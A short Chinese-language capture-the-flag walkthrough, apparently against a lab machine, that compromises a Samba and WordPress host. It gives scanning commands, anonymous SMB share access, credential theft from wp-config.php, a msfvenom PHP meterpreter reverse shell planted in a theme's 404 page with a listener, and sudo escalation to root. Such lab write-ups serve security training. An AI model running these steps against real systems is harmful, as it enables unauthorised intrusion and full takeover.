kali：192.168.223.131
target：192.168.223.168

通過arp-scan掃出ip為192.168.223.168，再通過nmap掃描

nmap -sV 192.168.223.168

通過nmap掃描，發現開放22、80，其中139和445都是Samba伺服器，3306是Mysql和6667埠

使用smbclient嘗試連線

smbclient -L 192.168.223.168

發現沒有密碼，有print$、share$、IPC$，嘗試連線share$

smbclient '\\192.168.223.168\share$'

直接Enter發現直接進去了，無密碼

看一下里面的deets.txt檔案

get deets.txt

開一個新終端開啟deets.txt，裡面找到密碼為12345

通過觀察smb伺服器發現有wordpress，推測是網站目錄，進入wordpress後找到wordpress的配置檔案

get wp-config.php

在新的終端開啟該檔案，為資料庫的連線檔案，找到賬號密碼為Admin和TogieMYSQL12345^^

到這裡沒什麼頭緒了，對網站進行目錄掃描

dirb http://192.168.223.168

掃出wordpress/wp-admin，嘗試用上面獲得的賬號密碼進行登陸，進入後臺，在Appearance的Editor裡面，發現可以編輯php檔案

通過msf生成php木馬，將其複製到對方的404頁面的php檔案中

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > /shell.php

開啟監聽

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
set lport 4444
exploit

找到404頁面，通過安裝CMS獲得地址，並執行，此時目標上線

192.168.223.168/wordpress/wp-content/themes/twentyfifteen/404.php
 

美化一下介面並看一下使用者有哪些

python -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwd

找到有一個叫togie的使用者，在home目錄下，根據之前的deets.txt中獲得密碼進行提權

su togie
//12345

檢視使用者許可權發現是三個ALL，直接提權至root

sudo -l
sudo su

然後在root目錄下獲取目標檔案